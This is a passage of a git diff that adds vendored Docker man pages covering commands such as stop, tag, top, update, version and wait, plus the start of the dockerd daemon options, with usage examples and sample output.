+  Disable streaming stats and only pull the first result, default setting is false.
+
+**--format**="*TEMPLATE*"
+   Pretty-print containers statistics using a Go template.
+   Valid placeholders:
+      .Container - Container name or ID.
+      .Name - Container name.
+      .ID - Container ID.
+      .CPUPerc - CPU percentage.
+      .MemUsage - Memory usage.
+      .NetIO - Network IO.
+      .BlockIO - Block IO.
+      .MemPerc - Memory percentage (Not available on Windows).
+      .PIDs - Number of PIDs (Not available on Windows).
+
+# EXAMPLES
+
+Running `docker stats` on all running containers
+
+    $ docker stats
+    CONTAINER           CPU %               MEM USAGE / LIMIT     MEM %               NET I/O             BLOCK I/O
+    1285939c1fd3        0.07%               796 KiB / 64 MiB        1.21%               788 B / 648 B       3.568 MB / 512 KB
+    9c76f7834ae2        0.07%               2.746 MiB / 64 MiB      4.29%               1.266 KB / 648 B    12.4 MB / 0 B
+    d1ea048f04e4        0.03%               4.583 MiB / 64 MiB      6.30%               2.854 KB / 648 B    27.7 MB / 0 B
+
+Running `docker stats` on multiple containers by name and id.
+
+    $ docker stats fervent_panini 5acfcb1b4fd1
+    CONTAINER           CPU %               MEM USAGE/LIMIT     MEM %               NET I/O
+    5acfcb1b4fd1        0.00%               115.2 MiB/1.045 GiB   11.03%              1.422 kB/648 B
+    fervent_panini      0.02%               11.08 MiB/1.045 GiB   1.06%               648 B/648 B
diff --git a/vendor/github.com/docker/docker/man/docker-stop.1.md b/vendor/github.com/docker/docker/man/docker-stop.1.md
new file mode 100644
index 0000000000..fa377c92c4
--- /dev/null
+++ b/vendor/github.com/docker/docker/man/docker-stop.1.md
@@ -0,0 +1,30 @@
+% DOCKER(1) Docker User Manuals
+% Docker Community
+% JUNE 2014
+# NAME
+docker-stop - Stop a container by sending SIGTERM and then SIGKILL after a grace period
+
+# SYNOPSIS
+**docker stop**
+[**--help**]
+[**-t**|**--time**[=*10*]]
+CONTAINER [CONTAINER...]
+
+# DESCRIPTION
+Stop a container (Send SIGTERM, and then SIGKILL after
+ grace period)
+
+# OPTIONS
+**--help**
+  Print usage statement
+
+**-t**, **--time**=*10*
+  Number of seconds to wait for the container to stop before killing it. Default is 10 seconds.
+
+#See also
+**docker-start(1)** to restart a stopped container.
+
+# HISTORY
+April 2014, Originally compiled by William Henry (whenry at redhat dot com)
+based on docker.com source material and internal work.
+June 2014, updated by Sven Dowideit <SvenDowideit@home.org.au>
diff --git a/vendor/github.com/docker/docker/man/docker-tag.1.md b/vendor/github.com/docker/docker/man/docker-tag.1.md
new file mode 100644
index 0000000000..7f27e1b0e1
--- /dev/null
+++ b/vendor/github.com/docker/docker/man/docker-tag.1.md
@@ -0,0 +1,76 @@
+% DOCKER(1) Docker User Manuals
+% Docker Community
+% JUNE 2014
+# NAME
+docker-tag - Create a tag `TARGET_IMAGE` that refers to `SOURCE_IMAGE`
+
+# SYNOPSIS
+**docker tag**
+[**--help**]
+SOURCE_NAME[:TAG] TARGET_NAME[:TAG]
+
+# DESCRIPTION
+Assigns a new alias to an image in a registry. An alias refers to the
+entire image name including the optional `TAG` after the ':'. 
+
+# "OPTIONS"
+**--help**
+   Print usage statement.
+
+**NAME**
+   The image name which is made up of slash-separated name components, 
+   optionally prefixed by a registry hostname. The hostname must comply with 
+   standard DNS rules, but may not contain underscores. If a hostname is 
+   present, it may optionally be followed by a port number in the format 
+   `:8080`. If not present, the command uses Docker's public registry located at
+   `registry-1.docker.io` by default. Name components may contain lowercase 
+   characters, digits and separators. A separator is defined as a period, one or 
+   two underscores, or one or more dashes. A name component may not start or end 
+   with a separator.
+
+**TAG**
+   The tag assigned to the image to version and distinguish images with the same
+   name. The tag name may contain lowercase and uppercase characters, digits, 
+   underscores, periods and dashes. A tag name may not start with a period or a 
+   dash and may contain a maximum of 128 characters.
+
+# EXAMPLES
+
+## Tagging an image referenced by ID
+
+To tag a local image with ID "0e5574283393" into the "fedora" repository with 
+"version1.0":
+
+    docker tag 0e5574283393 fedora/httpd:version1.0
+
+## Tagging an image referenced by Name
+
+To tag a local image with name "httpd" into the "fedora" repository with 
+"version1.0":
+
+    docker tag httpd fedora/httpd:version1.0
+
+Note that since the tag name is not specified, the alias is created for an
+existing local version `httpd:latest`.
+
+## Tagging an image referenced by Name and Tag
+
+To tag a local image with name "httpd" and tag "test" into the "fedora"
+repository with "version1.0.test":
+
+    docker tag httpd:test fedora/httpd:version1.0.test
+
+## Tagging an image for a private repository
+
+To push an image to a private registry and not the central Docker
+registry you must tag it with the registry hostname and port (if needed).
+
+    docker tag 0e5574283393 myregistryhost:5000/fedora/httpd:version1.0
+
+# HISTORY
+April 2014, Originally compiled by William Henry (whenry at redhat dot com)
+based on docker.com source material and internal work.
+June 2014, updated by Sven Dowideit <SvenDowideit@home.org.au>
+July 2014, updated by Sven Dowideit <SvenDowideit@home.org.au>
+April 2015, updated by Mary Anthony for v2 <mary@docker.com>
+June 2015, updated by Sally O'Malley <somalley@redhat.com>
diff --git a/vendor/github.com/docker/docker/man/docker-top.1.md b/vendor/github.com/docker/docker/man/docker-top.1.md
new file mode 100644
index 0000000000..a666f7cd37
--- /dev/null
+++ b/vendor/github.com/docker/docker/man/docker-top.1.md
@@ -0,0 +1,36 @@
+% DOCKER(1) Docker User Manuals
+% Docker Community
+% JUNE 2014
+# NAME
+docker-top - Display the running processes of a container
+
+# SYNOPSIS
+**docker top**
+[**--help**]
+CONTAINER [ps OPTIONS]
+
+# DESCRIPTION
+
+Display the running process of the container. ps-OPTION can be any of the options you would pass to a Linux ps command.
+
+All displayed information is from host's point of view.
+
+# OPTIONS
+**--help**
+  Print usage statement
+
+# EXAMPLES
+
+Run **docker top** with the ps option of -x:
+
+    $ docker top 8601afda2b -x
+    PID      TTY       STAT       TIME         COMMAND
+    16623    ?         Ss         0:00         sleep 99999
+
+
+# HISTORY
+April 2014, Originally compiled by William Henry (whenry at redhat dot com)
+based on docker.com source material and internal work.
+June 2014, updated by Sven Dowideit <SvenDowideit@home.org.au>
+June 2015, updated by Ma Shimiao <mashimiao.fnst@cn.fujitsu.com>
+December 2015, updated by Pavel Pospisil <pospispa@gmail.com>
diff --git a/vendor/github.com/docker/docker/man/docker-unpause.1.md b/vendor/github.com/docker/docker/man/docker-unpause.1.md
new file mode 100644
index 0000000000..e6fd3c4e01
--- /dev/null
+++ b/vendor/github.com/docker/docker/man/docker-unpause.1.md
@@ -0,0 +1,28 @@
+% DOCKER(1) Docker User Manuals
+% Docker Community
+% JUNE 2014
+# NAME
+docker-unpause - Unpause all processes within one or more containers
+
+# SYNOPSIS
+**docker unpause**
+CONTAINER [CONTAINER...]
+
+# DESCRIPTION
+
+The `docker unpause` command un-suspends all processes in the specified containers.
+On Linux, it does this using the cgroups freezer.
+
+See the [cgroups freezer documentation]
+(https://www.kernel.org/doc/Documentation/cgroup-v1/freezer-subsystem.txt) for
+further details.
+
+# OPTIONS
+**--help**
+  Print usage statement
+
+# See also
+**docker-pause(1)** to pause all processes within one or more containers.
+
+# HISTORY
+June 2014, updated by Sven Dowideit <SvenDowideit@home.org.au>
diff --git a/vendor/github.com/docker/docker/man/docker-update.1.md b/vendor/github.com/docker/docker/man/docker-update.1.md
new file mode 100644
index 0000000000..85f3dd07c1
--- /dev/null
+++ b/vendor/github.com/docker/docker/man/docker-update.1.md
@@ -0,0 +1,171 @@
+% DOCKER(1) Docker User Manuals
+% Docker Community
+% JUNE 2014
+# NAME
+docker-update - Update configuration of one or more containers
+
+# SYNOPSIS
+**docker update**
+[**--blkio-weight**[=*[BLKIO-WEIGHT]*]]
+[**--cpu-shares**[=*0*]]
+[**--cpu-period**[=*0*]]
+[**--cpu-quota**[=*0*]]
+[**--cpu-rt-period**[=*0*]]
+[**--cpu-rt-runtime**[=*0*]]
+[**--cpuset-cpus**[=*CPUSET-CPUS*]]
+[**--cpuset-mems**[=*CPUSET-MEMS*]]
+[**--help**]
+[**--kernel-memory**[=*KERNEL-MEMORY*]]
+[**-m**|**--memory**[=*MEMORY*]]
+[**--memory-reservation**[=*MEMORY-RESERVATION*]]
+[**--memory-swap**[=*MEMORY-SWAP*]]
+[**--restart**[=*""*]]
+CONTAINER [CONTAINER...]
+
+# DESCRIPTION
+
+The **docker update** command dynamically updates container configuration.
+You can use this command to prevent containers from consuming too many 
+resources from their Docker host.  With a single command, you can place 
+limits on a single container or on many. To specify more than one container,
+provide space-separated list of container names or IDs.
+
+With the exception of the **--kernel-memory** option, you can specify these
+options on a running or a stopped container. On kernel version older than
+4.6, You can only update **--kernel-memory** on a stopped container or on
+a running container with kernel memory initialized.
+
+# OPTIONS
+
+**--blkio-weight**=0
+   Block IO weight (relative weight) accepts a weight value between 10 and 1000.
+
+**--cpu-shares**=0
+   CPU shares (relative weight)
+
+**--cpu-period**=0
+   Limit the CPU CFS (Completely Fair Scheduler) period
+
+   Limit the container's CPU usage. This flag tell the kernel to restrict the container's CPU usage to the period you specify.
+
+**--cpu-quota**=0
+   Limit the CPU CFS (Completely Fair Scheduler) quota
+
+**--cpu-rt-period**=0
+   Limit the CPU real-time period in microseconds
+
+   Limit the container's Real Time CPU usage. This flag tell the kernel to restrict the container's Real Time CPU usage to the period you specify.
+
+**--cpu-rt-runtime**=0
+   Limit the CPU real-time runtime in microseconds
+
+   Limit the containers Real Time CPU usage. This flag tells the kernel to limit the amount of time in a given CPU period Real Time tasks may consume. Ex:
+   Period of 1,000,000us and Runtime of 950,000us means that this container could consume 95% of available CPU and leave the remaining 5% to normal priority tasks.
+
+   The sum of all runtimes across containers cannot exceed the amount allotted to the parent cgroup.
+
+**--cpuset-cpus**=""
+   CPUs in which to allow execution (0-3, 0,1)
+
+**--cpuset-mems**=""
+   Memory nodes(MEMs) in which to allow execution (0-3, 0,1). Only effective on NUMA systems.
+
+**--help**
+   Print usage statement
+
+**--kernel-memory**=""
+   Kernel memory limit (format: `<number>[<unit>]`, where unit = b, k, m or g)
+
+   Note that on kernel version older than 4.6, you can not update kernel memory on
+   a running container if the container is started without kernel memory initialized,
+   in this case, it can only be updated after it's stopped. The new setting takes
+   effect when the container is started.
+
+**-m**, **--memory**=""
+   Memory limit (format: <number><optional unit>, where unit = b, k, m or g)
+
+   Note that the memory should be smaller than the already set swap memory limit.
+   If you want update a memory limit bigger than the already set swap memory limit,
+   you should update swap memory limit at the same time. If you don't set swap memory 
+   limit on docker create/run but only memory limit, the swap memory is double
+   the memory limit.
+
+**--memory-reservation**=""
+   Memory soft limit (format: <number>[<unit>], where unit = b, k, m or g)
+
+**--memory-swap**=""
+   Total memory limit (memory + swap)
+
+**--restart**=""
+   Restart policy to apply when a container exits (no, on-failure[:max-retry], always, unless-stopped).
+
+# EXAMPLES
+
+The following sections illustrate ways to use this command.
+
+### Update a container's cpu-shares
+
+To limit a container's cpu-shares to 512, first identify the container
+name or ID. You can use **docker ps** to find these values. You can also
+use the ID returned from the **docker run** command.  Then, do the following:
+
+```bash
+$ docker update --cpu-shares 512 abebf7571666
+```
+
+### Update a container with cpu-shares and memory
+
+To update multiple resource configurations for multiple containers:
+
+```bash
+$ docker update --cpu-shares 512 -m 300M abebf7571666 hopeful_morse
+```
+
+### Update a container's kernel memory constraints
+
+You can update a container's kernel memory limit using the **--kernel-memory**
+option. On kernel version older than 4.6, this option can be updated on a
+running container only if the container was started with **--kernel-memory**.
+If the container was started *without* **--kernel-memory** you need to stop
+the container before updating kernel memory.
+
+For example, if you started a container with this command:
+
+```bash
+$ docker run -dit --name test --kernel-memory 50M ubuntu bash
+```
+
+You can update kernel memory while the container is running:
+
+```bash
+$ docker update --kernel-memory 80M test
+```
+
+If you started a container *without* kernel memory initialized:
+
+```bash
+$ docker run -dit --name test2 --memory 300M ubuntu bash
+```
+
+Update kernel memory of running container `test2` will fail. You need to stop
+the container before updating the **--kernel-memory** setting. The next time you
+start it, the container uses the new value.
+
+Kernel version newer than (include) 4.6 does not have this limitation, you
+can use `--kernel-memory` the same way as other options.
+
+### Update a container's restart policy
+
+You can change a container's restart policy on a running container. The new
+restart policy takes effect instantly after you run `docker update` on a
+container.
+
+To update restart policy for one or more containers:
+
+```bash
+$ docker update --restart=on-failure:3 abebf7571666 hopeful_morse
+```
+
+Note that if the container is started with "--rm" flag, you cannot update the restart
+policy for it. The `AutoRemove` and `RestartPolicy` are mutually exclusive for the
+container.
diff --git a/vendor/github.com/docker/docker/man/docker-version.1.md b/vendor/github.com/docker/docker/man/docker-version.1.md
new file mode 100644
index 0000000000..1838f82052
--- /dev/null
+++ b/vendor/github.com/docker/docker/man/docker-version.1.md
@@ -0,0 +1,62 @@
+% DOCKER(1) Docker User Manuals
+% Docker Community
+% JUNE 2015
+# NAME
+docker-version - Show the Docker version information.
+
+# SYNOPSIS
+**docker version**
+[**--help**]
+[**-f**|**--format**[=*FORMAT*]]
+
+# DESCRIPTION
+This command displays version information for both the Docker client and 
+daemon. 
+
+# OPTIONS
+**--help**
+    Print usage statement
+
+**-f**, **--format**=""
+    Format the output using the given Go template.
+
+# EXAMPLES
+
+## Display Docker version information
+
+The default output:
+
+    $ docker version
+	Client:
+	 Version:      1.8.0
+	 API version:  1.20
+	 Go version:   go1.4.2
+	 Git commit:   f5bae0a
+	 Built:        Tue Jun 23 17:56:00 UTC 2015
+	 OS/Arch:      linux/amd64
+
+	Server:
+	 Version:      1.8.0
+	 API version:  1.20
+	 Go version:   go1.4.2
+	 Git commit:   f5bae0a
+	 Built:        Tue Jun 23 17:56:00 UTC 2015
+	 OS/Arch:      linux/amd64
+
+Get server version:
+
+    $ docker version --format '{{.Server.Version}}'
+	1.8.0
+
+Dump raw data:
+
+To view all available fields, you can use the format `{{json .}}`.
+
+    $ docker version --format '{{json .}}'
+    {"Client":{"Version":"1.8.0","ApiVersion":"1.20","GitCommit":"f5bae0a","GoVersion":"go1.4.2","Os":"linux","Arch":"amd64","BuildTime":"Tue Jun 23 17:56:00 UTC 2015"},"ServerOK":true,"Server":{"Version":"1.8.0","ApiVersion":"1.20","GitCommit":"f5bae0a","GoVersion":"go1.4.2","Os":"linux","Arch":"amd64","KernelVersion":"3.13.2-gentoo","BuildTime":"Tue Jun 23 17:56:00 UTC 2015"}}
+
+	
+# HISTORY
+June 2014, updated by Sven Dowideit <SvenDowideit@home.org.au>
+June 2015, updated by John Howard <jhoward@microsoft.com>
+June 2015, updated by Patrick Hemmer <patrick.hemmer@gmail.com>
diff --git a/vendor/github.com/docker/docker/man/docker-wait.1.md b/vendor/github.com/docker/docker/man/docker-wait.1.md
new file mode 100644
index 0000000000..678800966b
--- /dev/null
+++ b/vendor/github.com/docker/docker/man/docker-wait.1.md
@@ -0,0 +1,30 @@
+% DOCKER(1) Docker User Manuals
+% Docker Community
+% JUNE 2014
+# NAME
+docker-wait - Block until one or more containers stop, then print their exit codes
+
+# SYNOPSIS
+**docker wait**
+[**--help**]
+CONTAINER [CONTAINER...]
+
+# DESCRIPTION
+
+Block until one or more containers stop, then print their exit codes.
+
+# OPTIONS
+**--help**
+  Print usage statement
+
+# EXAMPLES
+
+    $ docker run -d fedora sleep 99
+    079b83f558a2bc52ecad6b2a5de13622d584e6bb1aea058c11b36511e85e7622
+    $ docker wait 079b83f558a2bc
+    0
+
+# HISTORY
+April 2014, Originally compiled by William Henry (whenry at redhat dot com)
+based on docker.com source material and internal work.
+June 2014, updated by Sven Dowideit <SvenDowideit@home.org.au>
diff --git a/vendor/github.com/docker/docker/man/docker.1.md b/vendor/github.com/docker/docker/man/docker.1.md
new file mode 100644
index 0000000000..2a96184439
--- /dev/null
+++ b/vendor/github.com/docker/docker/man/docker.1.md
@@ -0,0 +1,237 @@
+% DOCKER(1) Docker User Manuals
+% William Henry
+% APRIL 2014
+# NAME
+docker \- Docker image and container command line interface
+
+# SYNOPSIS
+**docker** [OPTIONS] COMMAND [ARG...]
+
+**docker** daemon [--help|...]
+
+**docker** [--help|-v|--version]
+
+# DESCRIPTION
+is a client for interacting with the daemon (see **dockerd(8)**) through the CLI.
+
+The Docker CLI has over 30 commands. The commands are listed below and each has
+its own man page which explain usage and arguments.
+
+To see the man page for a command run **man docker <command>**.
+
+# OPTIONS
+**--help**
+  Print usage statement
+
+**--config**=""
+  Specifies the location of the Docker client configuration files. The default is '~/.docker'.
+
+**-D**, **--debug**=*true*|*false*
+  Enable debug mode. Default is false.
+
+**-H**, **--host**=[*unix:///var/run/docker.sock*]: tcp://[host]:[port][path] to bind or
+unix://[/path/to/socket] to use.
+  The socket(s) to bind to in daemon mode specified using one or more
+  tcp://host:port/path, unix:///path/to/socket, fd://* or fd://socketfd.
+  If the tcp port is not specified, then it will default to either `2375` when
+  `--tls` is off, or `2376` when `--tls` is on, or `--tlsverify` is specified.
+
+**-l**, **--log-level**="*debug*|*info*|*warn*|*error*|*fatal*"
+  Set the logging level. Default is `info`.
+
+**--tls**=*true*|*false*
+  Use TLS; implied by --tlsverify. Default is false.
+
+**--tlscacert**=*~/.docker/ca.pem*
+  Trust certs signed only by this CA.
+
+**--tlscert**=*~/.docker/cert.pem*
+  Path to TLS certificate file.
+
+**--tlskey**=*~/.docker/key.pem*
+  Path to TLS key file.
+
+**--tlsverify**=*true*|*false*
+  Use TLS and verify the remote (daemon: verify client, client: verify daemon).
+  Default is false.
+
+**-v**, **--version**=*true*|*false*
+  Print version information and quit. Default is false.
+
+# COMMANDS
+**attach**
+  Attach to a running container
+  See **docker-attach(1)** for full documentation on the **attach** command.
+
+**build**
+  Build an image from a Dockerfile
+  See **docker-build(1)** for full documentation on the **build** command.
+
+**commit**
+  Create a new image from a container's changes
+  See **docker-commit(1)** for full documentation on the **commit** command.
+
+**cp**
+  Copy files/folders between a container and the local filesystem
+  See **docker-cp(1)** for full documentation on the **cp** command.
+
+**create**
+  Create a new container
+  See **docker-create(1)** for full documentation on the **create** command.
+
+**diff**
+  Inspect changes on a container's filesystem
+  See **docker-diff(1)** for full documentation on the **diff** command.
+
+**events**
+  Get real time events from the server
+  See **docker-events(1)** for full documentation on the **events** command.
+
+**exec**
+  Run a command in a running container
+  See **docker-exec(1)** for full documentation on the **exec** command.
+
+**export**
+  Stream the contents of a container as a tar archive
+  See **docker-export(1)** for full documentation on the **export** command.
+
+**history**
+  Show the history of an image
+  See **docker-history(1)** for full documentation on the **history** command.
+
+**images**
+  List images
+  See **docker-images(1)** for full documentation on the **images** command.
+
+**import**
+  Create a new filesystem image from the contents of a tarball
+  See **docker-import(1)** for full documentation on the **import** command.
+
+**info**
+  Display system-wide information
+  See **docker-info(1)** for full documentation on the **info** command.
+
+**inspect**
+  Return low-level information on a container or image
+  See **docker-inspect(1)** for full documentation on the **inspect** command.
+
+**kill**
+  Kill a running container (which includes the wrapper process and everything
+inside it)
+  See **docker-kill(1)** for full documentation on the **kill** command.
+
+**load**
+  Load an image from a tar archive
+  See **docker-load(1)** for full documentation on the **load** command.
+
+**login**
+  Log in to a Docker Registry
+  See **docker-login(1)** for full documentation on the **login** command.
+
+**logout**
+  Log the user out of a Docker Registry
+  See **docker-logout(1)** for full documentation on the **logout** command.
+
+**logs**
+  Fetch the logs of a container
+  See **docker-logs(1)** for full documentation on the **logs** command.
+
+**pause**
+  Pause all processes within a container
+  See **docker-pause(1)** for full documentation on the **pause** command.
+
+**port**
+  Lookup the public-facing port which is NAT-ed to PRIVATE_PORT
+  See **docker-port(1)** for full documentation on the **port** command.
+
+**ps**
+  List containers
+  See **docker-ps(1)** for full documentation on the **ps** command.
+
+**pull**
+  Pull an image or a repository from a Docker Registry
+  See **docker-pull(1)** for full documentation on the **pull** command.
+
+**push**
+  Push an image or a repository to a Docker Registry
+  See **docker-push(1)** for full documentation on the **push** command.
+
+**rename**
+  Rename a container.
+  See **docker-rename(1)** for full documentation on the **rename** command.
+
+**restart**
+  Restart one or more containers
+  See **docker-restart(1)** for full documentation on the **restart** command.
+
+**rm**
+  Remove one or more containers
+  See **docker-rm(1)** for full documentation on the **rm** command.
+
+**rmi**
+  Remove one or more images
+  See **docker-rmi(1)** for full documentation on the **rmi** command.
+
+**run**
+  Run a command in a new container
+  See **docker-run(1)** for full documentation on the **run** command.
+
+**save**
+  Save an image to a tar archive
+  See **docker-save(1)** for full documentation on the **save** command.
+
+**search**
+  Search for an image in the Docker index
+  See **docker-search(1)** for full documentation on the **search** command.
+
+**start**
+  Start a container
+  See **docker-start(1)** for full documentation on the **start** command.
+
+**stats**
+  Display a live stream of one or more containers' resource usage statistics
+  See **docker-stats(1)** for full documentation on the **stats** command.
+
+**stop**
+  Stop a container
+  See **docker-stop(1)** for full documentation on the **stop** command.
+
+**tag**
+  Tag an image into a repository
+  See **docker-tag(1)** for full documentation on the **tag** command.
+
+**top**
+  Lookup the running processes of a container
+  See **docker-top(1)** for full documentation on the **top** command.
+
+**unpause**
+  Unpause all processes within a container
+  See **docker-unpause(1)** for full documentation on the **unpause** command.
+
+**version**
+  Show the Docker version information
+  See **docker-version(1)** for full documentation on the **version** command.
+
+**wait**
+  Block until a container stops, then print its exit code
+  See **docker-wait(1)** for full documentation on the **wait** command.
+
+
+# RUNTIME EXECUTION OPTIONS
+
+Use the **--exec-opt** flags to specify options to the execution driver.
+The following options are available:
+
+#### native.cgroupdriver
+Specifies the management of the container's `cgroups`. You can specify `cgroupfs`
+or `systemd`. If you specify `systemd` and it is not available, the system errors
+out.
+
+#### Client
+For specific client examples please see the man page for the specific Docker
+command. For example:
+
+    man docker-run
+
+# HISTORY
+April 2014, Originally compiled by William Henry (whenry at redhat dot com) based on docker.com source material and internal work.
diff --git a/vendor/github.com/docker/docker/man/dockerd.8.md b/vendor/github.com/docker/docker/man/dockerd.8.md
new file mode 100644
index 0000000000..761dc6b9be
--- /dev/null
+++ b/vendor/github.com/docker/docker/man/dockerd.8.md
@@ -0,0 +1,710 @@
+% DOCKER(8) Docker User Manuals
+% Shishir Mahajan
+% SEPTEMBER 2015
+# NAME
+dockerd - Enable daemon mode
+
+# SYNOPSIS
+**dockerd**
+[**--add-runtime**[=*[]*]]
+[**--api-cors-header**=[=*API-CORS-HEADER*]]
+[**--authorization-plugin**[=*[]*]]
+[**-b**|**--bridge**[=*BRIDGE*]]
+[**--bip**[=*BIP*]]
+[**--cgroup-parent**[=*[]*]]
+[**--cluster-store**[=*[]*]]
+[**--cluster-advertise**[=*[]*]]
+[**--cluster-store-opt**[=*map[]*]]
+[**--config-file**[=*/etc/docker/daemon.json*]]
+[**--containerd**[=*SOCKET-PATH*]]
+[**-D**|**--debug**]
+[**--default-gateway**[=*DEFAULT-GATEWAY*]]
+[**--default-gateway-v6**[=*DEFAULT-GATEWAY-V6*]]
+[**--default-runtime**[=*runc*]]
+[**--default-ulimit**[=*[]*]]
+[**--disable-legacy-registry**]
+[**--dns**[=*[]*]]
+[**--dns-opt**[=*[]*]]
+[**--dns-search**[=*[]*]]
+[**--exec-opt**[=*[]*]]
+[**--exec-root**[=*/var/run/docker*]]
+[**--experimental**[=*false*]]
+[**--fixed-cidr**[=*FIXED-CIDR*]]
+[**--fixed-cidr-v6**[=*FIXED-CIDR-V6*]]
+[**-G**|**--group**[=*docker*]]
+[**-g**|**--graph**[=*/var/lib/docker*]]
+[**-H**|**--host**[=*[]*]]
+[**--help**]
+[**--icc**[=*true*]]
+[**--init**[=*false*]]
+[**--init-path**[=*""*]]
+[**--insecure-registry**[=*[]*]]
+[**--ip**[=*0.0.0.0*]]
+[**--ip-forward**[=*true*]]
+[**--ip-masq**[=*true*]]
+[**--iptables**[=*true*]]
+[**--ipv6**]
+[**--isolation**[=*default*]]
+[**-l**|**--log-level**[=*info*]]
+[**--label**[=*[]*]]
+[**--live-restore**[=*false*]]
+[**--log-driver**[=*json-file*]]
+[**--log-opt**[=*map[]*]]
+[**--mtu**[=*0*]]
+[**--max-concurrent-downloads**[=*3*]]
+[**--max-concurrent-uploads**[=*5*]]
+[**-p**|**--pidfile**[=*/var/run/docker.pid*]]
+[**--raw-logs**]
+[**--registry-mirror**[=*[]*]]
+[**-s**|**--storage-driver**[=*STORAGE-DRIVER*]]
+[**--seccomp-profile**[=*SECCOMP-PROFILE-PATH*]]
+[**--selinux-enabled**]
+[**--shutdown-timeout**[=*15*]]
+[**--storage-opt**[=*[]*]]
+[**--swarm-default-advertise-addr**[=*IP|INTERFACE*]]
+[**--tls**]
+[**--tlscacert**[=*~/.docker/ca.pem*]]
+[**--tlscert**[=*~/.docker/cert.pem*]]
+[**--tlskey**[=*~/.docker/key.pem*]]
+[**--tlsverify**]
+[**--userland-proxy**[=*true*]]
+[**--userland-proxy-path**[=*""*]]
+[**--userns-remap**[=*default*]]
+
+# DESCRIPTION
+**dockerd** is used for starting the Docker daemon (i.e., to command the daemon
+to manage images, containers etc).  So **dockerd** is a server, as a daemon.
+
+To run the Docker daemon you can specify **dockerd**.
+You can check the daemon options using **dockerd --help**.
+Daemon options should be specified after the **dockerd** keyword in the
+following format.
+
+**dockerd [OPTIONS]**
+
+# OPTIONS
+
+**--add-runtime**=[]
+  Runtimes can be registered with the daemon either via the
+configuration file or using the `--add-runtime` command line argument.
+
+  The following is an example adding 2 runtimes via the configuration:
+
+```json
+{
+	"default-runtime": "runc",
+	"runtimes": {
+		"runc": {
+			"path": "runc"
+		},
+		"custom": {
+			"path": "/usr/local/bin/my-runc-replacement",
+			"runtimeArgs": [
+				"--debug"
+			]
+		}
+	}
+}
+```
+
+  This is the same example via the command line:
+
+```bash
+$ sudo dockerd --add-runtime runc=runc --add-runtime custom=/usr/local/bin/my-runc-replacement
+```
+
+  **Note**: defining runtime arguments via the command line is not supported.
+
+**--api-cors-header**=""
+  Set CORS headers in the Engine API. Default is cors disabled. Give urls like
+  "http://foo, http://bar, ...". Give "*" to allow all.
+
+**--authorization-plugin**=""
+  Set authorization plugins to load
+
+**-b**, **--bridge**=""
+  Attach containers to a pre\-existing network bridge; use 'none' to disable
+  container networking
+
+**--bip**=""
+  Use the provided CIDR notation address for the dynamically created bridge
+  (docker0); Mutually exclusive of \-b
+
+**--cgroup-parent**=""
+  Set parent cgroup for all containers. Default is "/docker" for fs cgroup
+  driver and "system.slice" for systemd cgroup driver.
+
+**--cluster-store**=""
+  URL of the distributed storage backend
+
+**--cluster-advertise**=""
+  Specifies the 'host:port' or `interface:port` combination that this
+  particular daemon instance should use when advertising itself to the cluster.
+  The daemon is reached through this value.
+
+**--cluster-store-opt**=""
+  Specifies options for the Key/Value store.
+
+**--config-file**="/etc/docker/daemon.json"
+  Specifies the JSON file path to load the configuration from.
+
+**--containerd**=""
+  Path to containerd socket.
+
+**-D**, **--debug**=*true*|*false*
+  Enable debug mode. Default is false.
+
+**--default-gateway**=""
+  IPv4 address of the container default gateway; this address must be part of
+  the bridge subnet (which is defined by \-b or \--bip)
+
+**--default-gateway-v6**=""
+  IPv6 address of the container default gateway
+
+**--default-runtime**="runc"
+  Set default runtime if there're more than one specified by `--add-runtime`.
+
+**--default-ulimit**=[]
+  Default ulimits for containers.
+
+**--disable-legacy-registry**=*true*|*false*
+  Disable contacting legacy registries
+
+**--dns**=""
+  Force Docker to use specific DNS servers
+
+**--dns-opt**=""
+  DNS options to use.
+
+**--dns-search**=[]
+  DNS search domains to use.
+
+**--exec-opt**=[]
+  Set runtime execution options. See RUNTIME EXECUTION OPTIONS.
+
+**--exec-root**=""
+  Path to use as the root of the Docker execution state files. Default is
+  `/var/run/docker`.
+
+**--experimental**=""
+  Enable the daemon experimental features.
+
+**--fixed-cidr**=""
+  IPv4 subnet for fixed IPs (e.g., 10.20.0.0/16); this subnet must be nested in
+  the bridge subnet (which is defined by \-b or \-\-bip).
+
+**--fixed-cidr-v6**=""
+  IPv6 subnet for global IPv6 addresses (e.g., 2a00:1450::/64)
+
+**-G**, **--group**=""
+  Group to assign the unix socket specified by -H when running in daemon mode.
+  use '' (the empty string) to disable setting of a group. Default is `docker`.
+
+**-g**, **--graph**=""
+  Path to use as the root of the Docker runtime. Default is `/var/lib/docker`.
+
+**-H**, **--host**=[*unix:///var/run/docker.sock*]: tcp://[host:port] to bind or
+unix://[/path/to/socket] to use.
+  The socket(s) to bind to in daemon mode specified using one or more
+  tcp://host:port, unix:///path/to/socket, fd://* or fd://socketfd.
+
+**--help**
+  Print usage statement
+
+**--icc**=*true*|*false*
+  Allow unrestricted inter\-container and Docker daemon host communication. If
+  disabled, containers can still be linked together using the **--link** option
+  (see **docker-run(1)**). Default is true.
+
+**--init**
+  Run an init process inside containers for signal forwarding and process
+  reaping.
+
+**--init-path**
+  Path to the docker-init binary.
+
+**--insecure-registry**=[]
+  Enable insecure registry communication, i.e., enable un-encrypted and/or
+  untrusted communication.
+
+  List of insecure registries can contain an element with CIDR notation to
+  specify a whole subnet. Insecure registries accept HTTP and/or accept HTTPS
+  with certificates from unknown CAs.
+
+  Enabling `--insecure-registry` is useful when running a local registry.
+  However, because its use creates security vulnerabilities it should ONLY be
+  enabled for testing purposes.  For increased security, users should add their
+  CA to their system's list of trusted CAs instead of using
+  `--insecure-registry`.
+
+**--ip**=""
+  Default IP address to use when binding container ports. Default is `0.0.0.0`.
+
+**--ip-forward**=*true*|*false*
+  Enables IP forwarding on the Docker host. The default is `true`. This flag
+  interacts with the IP forwarding setting on your host system's kernel. If
+  your system has IP forwarding disabled, this setting enables it. If your
+  system has IP forwarding enabled, setting this flag to `--ip-forward=false`
+  has no effect.
+
+  This setting will also enable IPv6 forwarding if you have both
+  `--ip-forward=true` and `--fixed-cidr-v6` set. Note that this may reject
+  Router Advertisements and interfere with the host's existing IPv6
+  configuration. For more information, please consult the documentation about
+  "Advanced Networking - IPv6".
+
+**--ip-masq**=*true*|*false*
+  Enable IP masquerading for bridge's IP range. Default is true.
+
+**--iptables**=*true*|*false*
+  Enable Docker's addition of iptables rules. Default is true.
+
+**--ipv6**=*true*|*false*
+  Enable IPv6 support. Default is false. Docker will create an IPv6-enabled
